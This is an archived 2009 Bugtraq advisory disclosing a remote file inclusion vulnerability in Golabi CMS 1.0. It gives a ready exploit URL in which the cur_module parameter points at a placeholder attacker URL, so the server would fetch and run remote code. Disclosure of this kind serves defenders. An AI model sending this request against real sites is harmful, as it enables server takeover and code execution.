[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Golabi CMS Remote File Inclusion Vulnerability
From: rezazahfaran () gmail ! com
Date: 2009-02-26 7:26:47
Message-ID: 200902260726.n1Q7QlDt019939 () www5 ! securityfocus ! com
[Download RAW message or body]
--------------------------------------------------------------------------------
[wWw.CrazyAngel.iR] - [info-AT-CrazyAngel.iR]
--------------------------------------------------------------------------------
[Golabi CMS Remote File Inclusion Vulnerability]
[+] Application Info:
[*] Name: Golabi CMS
[*] Author: R3dM0ve
[*] HomePage: http://golabicms.sourceforge.net/
[*] Download: http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr
[+] Vulnerability Info:
[*] Type: Remote File Inclusion (RFI)
[*] Requirement: register_globals [ON]
[*] Risk: High Critical
[*] Bug Hunter: CrazyAngel
[*] Details: Unhandled variable Inclusion in default template file results in RFI Vulnerability
[*] Vul URL: [GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL]
--------------------------------------------------------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic